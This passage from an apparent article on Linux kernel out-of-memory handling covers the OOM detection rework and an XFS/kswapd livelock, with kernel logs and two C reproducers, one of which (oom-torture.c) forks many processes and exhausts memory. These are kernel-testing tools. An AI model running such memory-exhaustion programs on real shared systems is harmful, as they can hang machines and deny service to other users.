[  314.293371] Node 0 DMA32 free:15244kB min:5564kB low:6952kB high:8344kB active_anon:82496kB inactive_anon:11976kB active_file:1110984kB inactive_file:467400kB unevictable:0kB isolated(anon):0kB isolated(file):88kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:9440kB shmem:16640kB slab_reclaimable:53684kB slab_unreclaimable:72536kB kernel_stack:40048kB pagetables:67672kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:12 all_unreclaimable? no
[  314.314336] Node 0 DMA32: 1180*4kB (UM) 1449*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16312kB
[  322.774181] Node 0 DMA32 free:19780kB min:5564kB low:6952kB high:8344kB active_anon:68264kB inactive_anon:17816kB active_file:1155724kB inactive_file:470216kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:8kB writeback:0kB mapped:9744kB shmem:24708kB slab_reclaimable:52540kB slab_unreclaimable:63216kB kernel_stack:32464kB pagetables:51856kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  322.796256] Node 0 DMA32: 86*4kB (UME) 2474*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20136kB
[  330.804341] Node 0 DMA32 free:22076kB min:5564kB low:6952kB high:8344kB active_anon:47616kB inactive_anon:17816kB active_file:1063272kB inactive_file:685848kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:216kB writeback:0kB mapped:9708kB shmem:24708kB slab_reclaimable:48536kB slab_unreclaimable:36844kB kernel_stack:12048kB pagetables:25992kB unstable:0kB bounce:0kB free_pcp:776kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  330.826190] Node 0 DMA32: 1637*4kB (UM) 1354*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17380kB
[  332.828224] Node 0 DMA32 free:15544kB min:5564kB low:6952kB high:8344kB active_anon:63184kB inactive_anon:17784kB active_file:1215752kB inactive_file:468872kB unevictable:0kB isolated(anon):0kB isolated(file):68kB present:2080640kB managed:2021100kB mlocked:0kB dirty:312kB writeback:0kB mapped:9116kB shmem:24708kB slab_reclaimable:49912kB slab_unreclaimable:50068kB kernel_stack:21600kB pagetables:42384kB unstable:0kB bounce:0kB free_pcp:1364kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  332.846805] Node 0 DMA32: 4108*4kB (UME) 897*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 23608kB
[  341.054731] Node 0 DMA32 free:20512kB min:5564kB low:6952kB high:8344kB active_anon:76796kB inactive_anon:23792kB active_file:1053836kB inactive_file:618588kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1656kB writeback:0kB mapped:19768kB shmem:32784kB slab_reclaimable:49000kB slab_unreclaimable:47636kB kernel_stack:21664kB pagetables:37188kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  341.073722] Node 0 DMA32: 3309*4kB (UM) 1124*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22228kB
[  360.075472] Node 0 DMA32 free:17856kB min:5564kB low:6952kB high:8344kB active_anon:117872kB inactive_anon:25588kB active_file:1022532kB inactive_file:466856kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:420kB writeback:0kB mapped:25300kB shmem:40976kB slab_reclaimable:57804kB slab_unreclaimable:79416kB kernel_stack:46784kB pagetables:78044kB unstable:0kB bounce:0kB free_pcp:1100kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  360.093794] Node 0 DMA32: 2719*4kB (UM) 97*8kB (UM) 14*16kB (UM) 37*32kB (UME) 27*64kB (UME) 3*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15172kB
[  368.853099] Node 0 DMA32 free:22524kB min:5564kB low:6952kB high:8344kB active_anon:79156kB inactive_anon:24876kB active_file:872972kB inactive_file:738900kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:25708kB shmem:40976kB slab_reclaimable:50820kB slab_unreclaimable:62880kB kernel_stack:32048kB pagetables:49656kB unstable:0kB bounce:0kB free_pcp:524kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  368.871173] Node 0 DMA32: 5042*4kB (UM) 248*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22152kB
[  379.261759] Node 0 DMA32 free:15888kB min:5564kB low:6952kB high:8344kB active_anon:89928kB inactive_anon:23780kB active_file:1295512kB inactive_file:358284kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1608kB writeback:0kB mapped:25376kB shmem:40976kB slab_reclaimable:47972kB slab_unreclaimable:50848kB kernel_stack:22320kB pagetables:42360kB unstable:0kB bounce:0kB free_pcp:248kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  379.279344] Node 0 DMA32: 2994*4kB (ME) 503*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16000kB
[  387.367409] Node 0 DMA32 free:15320kB min:5564kB low:6952kB high:8344kB active_anon:76364kB inactive_anon:28712kB active_file:1061180kB inactive_file:596956kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:20kB writeback:0kB mapped:27700kB shmem:49168kB slab_reclaimable:51236kB slab_unreclaimable:51096kB kernel_stack:22912kB pagetables:40920kB unstable:0kB bounce:0kB free_pcp:700kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  387.385740] Node 0 DMA32: 3638*4kB (UM) 115*8kB (UM) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15488kB
[  391.207543] Node 0 DMA32 free:15224kB min:5564kB low:6952kB high:8344kB active_anon:115956kB inactive_anon:28392kB active_file:1117532kB inactive_file:359656kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:29348kB shmem:49168kB slab_reclaimable:56028kB slab_unreclaimable:85168kB kernel_stack:48592kB pagetables:81620kB unstable:0kB bounce:0kB free_pcp:1124kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:356 all_unreclaimable? no
[  391.228084] Node 0 DMA32: 3374*4kB (UME) 221*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15264kB
[  395.663881] Node 0 DMA32 free:12820kB min:5564kB low:6952kB high:8344kB active_anon:98924kB inactive_anon:27520kB active_file:1105780kB inactive_file:494760kB unevictable:0kB isolated(anon):4kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1412kB writeback:12kB mapped:29588kB shmem:49168kB slab_reclaimable:49836kB slab_unreclaimable:60524kB kernel_stack:32176kB pagetables:50356kB unstable:0kB bounce:0kB free_pcp:1500kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:388 all_unreclaimable? no
[  395.683137] Node 0 DMA32: 3794*4kB (ME) 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15176kB
[  399.871655] Node 0 DMA32 free:18432kB min:5564kB low:6952kB high:8344kB active_anon:99156kB inactive_anon:26780kB active_file:1150532kB inactive_file:408872kB unevictable:0kB isolated(anon):68kB isolated(file):80kB present:2080640kB managed:2021100kB mlocked:0kB dirty:3492kB writeback:0kB mapped:30924kB shmem:49168kB slab_reclaimable:54236kB slab_unreclaimable:68184kB kernel_stack:37392kB pagetables:63708kB unstable:0kB bounce:0kB free_pcp:784kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  399.890082] Node 0 DMA32: 4155*4kB (UME) 200*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 18220kB
[  408.447006] Node 0 DMA32 free:12684kB min:5564kB low:6952kB high:8344kB active_anon:74296kB inactive_anon:25960kB active_file:1086404kB inactive_file:605660kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:264kB writeback:0kB mapped:30604kB shmem:49168kB slab_reclaimable:50200kB slab_unreclaimable:45212kB kernel_stack:19184kB pagetables:34500kB unstable:0kB bounce:0kB free_pcp:740kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  408.465169] Node 0 DMA32: 2804*4kB (ME) 203*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 12840kB
[  416.426931] Node 0 DMA32 free:15396kB min:5564kB low:6952kB high:8344kB active_anon:98836kB inactive_anon:32120kB active_file:964808kB inactive_file:666224kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:33628kB shmem:57332kB slab_reclaimable:51048kB slab_unreclaimable:51824kB kernel_stack:23328kB pagetables:41896kB unstable:0kB bounce:0kB free_pcp:988kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  416.447247] Node 0 DMA32: 5158*4kB (UME) 68*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 21176kB
[  418.780159] Node 0 DMA32 free:8876kB min:5564kB low:6952kB high:8344kB active_anon:86544kB inactive_anon:31516kB active_file:965016kB inactive_file:654444kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:8408kB shmem:57332kB slab_reclaimable:48856kB slab_unreclaimable:61116kB kernel_stack:30224kB pagetables:48636kB unstable:0kB bounce:0kB free_pcp:980kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:260 all_unreclaimable? no
[  418.799643] Node 0 DMA32: 3093*4kB (UME) 1043*8kB (UME) 2*16kB (M) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20748kB
[  428.087913] Node 0 DMA32 free:22760kB min:5564kB low:6952kB high:8344kB active_anon:94544kB inactive_anon:38936kB active_file:1013576kB inactive_file:564976kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:36096kB shmem:65376kB slab_reclaimable:52196kB slab_unreclaimable:60576kB kernel_stack:29888kB pagetables:56364kB unstable:0kB bounce:0kB free_pcp:852kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  428.109005] Node 0 DMA32: 2943*4kB (UME) 458*8kB (UME) 20*16kB (UME) 11*32kB (UME) 11*64kB (ME) 4*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17324kB
[  439.014180] Node 0 DMA32 free:11232kB min:5564kB low:6952kB high:8344kB active_anon:82868kB inactive_anon:38872kB active_file:1189912kB inactive_file:439592kB unevictable:0kB isolated(anon):12kB isolated(file):40kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:1152kB mapped:35948kB shmem:65376kB slab_reclaimable:51224kB slab_unreclaimable:56664kB kernel_stack:27696kB pagetables:43180kB unstable:0kB bounce:0kB free_pcp:380kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  439.032446] Node 0 DMA32: 2761*4kB (UM) 28*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 11268kB
[  441.731001] Node 0 DMA32 free:15056kB min:5564kB low:6952kB high:8344kB active_anon:90532kB inactive_anon:42716kB active_file:1204248kB inactive_file:377196kB unevictable:0kB isolated(anon):12kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5552kB shmem:73568kB slab_reclaimable:52956kB slab_unreclaimable:68304kB kernel_stack:39936kB pagetables:47472kB unstable:0kB bounce:0kB free_pcp:624kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  441.731018] Node 0 DMA32: 3130*4kB (UM) 338*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15224kB
[  442.070851] Node 0 DMA32 free:8852kB min:5564kB low:6952kB high:8344kB active_anon:90412kB inactive_anon:42664kB active_file:1179304kB inactive_file:371316kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5544kB shmem:73568kB slab_reclaimable:55136kB slab_unreclaimable:80080kB kernel_stack:55456kB pagetables:52692kB unstable:0kB bounce:0kB free_pcp:312kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:348 all_unreclaimable? no
[  442.070867] Node 0 DMA32: 590*4kB (ME) 827*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 8976kB
[  442.245192] Node 0 DMA32 free:10832kB min:5564kB low:6952kB high:8344kB active_anon:97756kB inactive_anon:42664kB active_file:1082048kB inactive_file:417012kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5248kB shmem:73568kB slab_reclaimable:62816kB slab_unreclaimable:88964kB kernel_stack:61408kB pagetables:62908kB unstable:0kB bounce:0kB free_pcp:696kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  442.245208] Node 0 DMA32: 1902*4kB (UME) 410*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 10888kB
---------- Example output end ----------

Because this problem was discovered, we concluded that more testing was needed, and the modification was not sent to Linux 4.6 as initially targeted. After a lot of further testing, we concluded that it gives reasonable results, and the modification was sent to Linux 4.7.

We are currently at the stage of checking whether it works well without side effects. But since nobody actively tests behavior under memory pressure, I can't rule out that unexpected side effects will be found after this change is included in enterprise Linux distributions.

Incidentally, a few hours before the modification was merged into linux.git, Oleg Nesterov reported that the system enters an OOM livelock situation due to the retry logic based on zone_reclaimable(). The modification should already solve that problem, but I was surprised to see the reproducer Oleg posted.

Mercy! Oleg reported that the problem can be reproduced by repeatedly running the reproducer shown below on a system with one CPU. This is in contrast to my multi-threaded reproducers, which I developed by trial and error in order to intentionally reproduce a near-OOM situation.

---------- oleg's-test.c ----------
#include <stdlib.h>
#include <string.h>

int main(void)
{
        for (;;) {
                void *p = malloc(1024 * 1024);
                memset(p, 0, 1024 * 1024);
        }
}
---------- oleg's-test.c ----------

...We can't predict in which situations a problem caused by memory management will pop up.

February 2016  All memory allocation requests get stuck at the same time

The OOM detection rework was discussed at length, as was the OOM reaper, but that discussion is too difficult for me to understand. Here I introduce one unresolved problem which was discovered while testing the OOM detection rework.

Linux 2.6.32 and later include commit 35cd78156c499ef8 ("vmscan: throttle direct reclaim when too many pages are isolated already") in order to avoid premature invocation of the OOM killer. But that patch did not anticipate a situation where the kswapd kernel thread, which reclaims memory asynchronously, is blocked on locks that are acquired while reclaiming memory. As a result, all threads doing memory allocation requests can loop forever waiting for kswapd, and the system enters an OOM livelock situation without invoking the OOM killer.

---------- oom-torture.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>

static volatile sig_atomic_t use_delay = 0; /* set from the SIGCLD handler */

static void sigcld_handler(int unused)
{
        use_delay = 1;
}

int main(int argc, char *argv[])
{
        static char buffer[4096] = { };
        char *buf = NULL;
        unsigned long size;
        int i;
        signal(SIGCLD, sigcld_handler);
        for (i = 0; i < 1024; i++) {
                if (fork() == 0) {
                        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1000", 4);
                        close(fd);
                        sleep(1);
                        if (!i)
                                pause();
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u", getpid());
                        fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600);
                        while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer)) {
                                poll(NULL, 0, 10);
                                fsync(fd);
                        }
                        _exit(0);
                }
        }
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(2);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096) {
                buf[i] = 0;
                if (use_delay) /* Give children a chance to write(). */
                        poll(NULL, 0, 10);
        }
        pause();
        return 0;
}
---------- oom-torture.c ----------
---------- Example output start ----------
[ 1096.700789] systemd invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[ 1096.708751] systemd cpuset=/ mems_allowed=0
[ 1096.712519] CPU: 2 PID: 1 Comm: systemd Not tainted 4.7.0-rc7+ #55
[ 1096.717463] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 1096.725553]  0000000000000286 0000000006e33503 ffff88003faef998 ffffffff812d727d
[ 1096.731302]  0000000000000000 ffff88003faefbb0 ffff88003faefa38 ffffffff811c5944
[ 1096.736956]  0000000000000206 ffffffff8182b870 ffff88003faef9d8 ffffffff810c0ef9
[ 1096.742600] Call Trace:
[ 1096.744916]  [<ffffffff812d727d>] dump_stack+0x85/0xc8
[ 1096.749276]  [<ffffffff811c5944>] dump_header+0x5b/0x3a8
[ 1096.753708]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1096.758659]  [<ffffffff810c0fcd>] ? trace_hardirqs_on+0xd/0x10
[ 1096.763176]  [<ffffffff81626e45>] ? _raw_spin_unlock_irqrestore+0x45/0x80
[ 1096.768275]  [<ffffffff8114eda8>] oom_kill_process+0x388/0x520
[ 1096.772759]  [<ffffffff8114f51f>] out_of_memory+0x58f/0x5e0
[ 1096.777101]  [<ffffffff8114f180>] ? out_of_memory+0x1f0/0x5e0
[ 1096.781511]  [<ffffffff8115447f>] __alloc_pages_nodemask+0xeff/0xf70
[ 1096.786612]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1096.791221]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1096.796023]  [<ffffffff8114cf5f>] filemap_fault+0x45f/0x670
[ 1096.800329]  [<ffffffff8114ce30>] ? filemap_fault+0x330/0x670
[ 1096.804672]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1096.809332]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1096.813331]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1096.817750]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
[ 1096.822166]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1096.826542]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1096.830551]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1096.835739] Mem-Info:
[ 1096.838525] active_anon:197561 inactive_anon:2919 isolated_anon:0
[ 1096.838525]  active_file:284 inactive_file:479 isolated_file:32
[ 1096.838525]  unevictable:0 dirty:0 writeback:126 unstable:0
[ 1096.838525]  slab_reclaimable:1717 slab_unreclaimable:11222
[ 1096.838525]  mapped:360 shmem:3239 pagetables:5654 bounce:0
[ 1096.838525]  free:12151 free_pcp:319 free_cma:0
[ 1096.867008] Node 0 DMA free:4472kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:44kB inactive_file:44kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:8kB mapped:44kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:796kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:568 all_unreclaimable? yes
[ 1096.904546] lowmem_reserve[]: 0 936 936 936
[ 1096.909808] Node 0 DMA32 free:45364kB min:44320kB low:55400kB high:66480kB active_anon:781560kB inactive_anon:11676kB active_file:1152kB inactive_file:1196kB unevictable:0kB isolated(anon):0kB isolated(file):256kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:496kB mapped:1396kB shmem:12948kB slab_reclaimable:6716kB slab_unreclaimable:43992kB kernel_stack:20384kB pagetables:22092kB unstable:0kB bounce:0kB free_pcp:716kB local_pcp:124kB free_cma:0kB writeback_tmp:0kB pages_scanned:3852 all_unreclaimable? no
[ 1096.945857] lowmem_reserve[]: 0 0 0 0
[ 1096.950262] Node 0 DMA: 38*4kB (UM) 26*8kB (UM) 11*16kB (UM) 11*32kB (UM) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4472kB
[ 1096.963656] Node 0 DMA32: 1333*4kB (UME) 1032*8kB (UME) 670*16kB (UME) 308*32kB (UME) 111*64kB (UE) 24*128kB (UME) 4*256kB (UM) 0*512kB 0*1024kB 0*2048kB 0*4096kB = 45364kB
[ 1096.976258] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1096.983860] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1096.994897] 3918 total pagecache pages
[ 1096.999165] 0 pages in swap cache
[ 1097.002688] Swap cache stats: add 0, delete 0, find 0/0
[ 1097.007309] Free swap  = 0kB
[ 1097.010194] Total swap = 0kB
[ 1097.012787] 262013 pages RAM
[ 1097.015345] 0 pages HighMem/MovableOnly
[ 1097.020898] 12770 pages reserved
[ 1097.024751] 0 pages cma reserved
[ 1097.027858] 0 pages hwpoisoned
[ 1097.031473] Out of memory: Kill process 4206 (oom-torture) score 999 or sacrifice child
[ 1097.037825] Killed process 4206 (oom-torture) total-vm:4176kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB
[ 1097.045884] oom_reaper: reaped process 4206 (oom-torture), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[ 1200.867049] INFO: task oom-torture:3970 blocked for more than 120 seconds.
[ 1200.890695]       Not tainted 4.7.0-rc7+ #55
[ 1200.898627] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1200.913371] oom-torture     D ffff88003bcff428     0  3970   3652 0x00000080
[ 1200.926432]  ffff88003bcff428 ffff88002a996100 ffff88003fba4080 ffff88002a996100
[ 1200.939946]  ffff88003bd00000 ffff880037de7070 ffff88002a996100 ffff880035d00000
[ 1200.950865]  0000000000000000 ffff88003bcff440 ffffffff81621dea 7fffffffffffffff
[ 1200.957640] Call Trace:
[ 1200.961125]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1200.965512]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1200.970311]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1200.975693]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1200.980603]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1200.985516]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1200.989693]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1200.994497]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1200.998181]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.002629]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.007199]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.011795]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.016359]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.021284]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.025590]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.030407]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.035343]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.039829]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.044235]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.048841]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.053380]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.057632]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.062077]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.066970]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.071307]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.075729]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.080437]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.085510]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.090299]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.094736]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.098589]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.103563]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.108244]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.112542]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.116499]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.120399]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.123990]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.127842]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.131751]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.136237] 2 locks held by oom-torture/3970:
[ 1201.141000]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.147852]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.155109] INFO: task oom-torture:4083 blocked for more than 120 seconds.
[ 1201.160866]       Not tainted 4.7.0-rc7+ #55
[ 1201.164425] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1201.170062] oom-torture     D ffff88003aa47428     0  4083   3652 0x00000080
[ 1201.176947]  ffff88003aa47428 ffff88003aa400c0 ffff88002bd3c100 ffff88003aa400c0
[ 1201.182405]  ffff88003aa48000 ffff880037de7070 ffff88003aa400c0 ffff880035d00000
[ 1201.188232]  0000000000000000 ffff88003aa47440 ffffffff81621dea 7fffffffffffffff
[ 1201.194181] Call Trace:
[ 1201.196438]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.200074]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.204263]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.208399]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.213164]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.217851]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.221396]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1201.225927]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.229349]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.233532]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
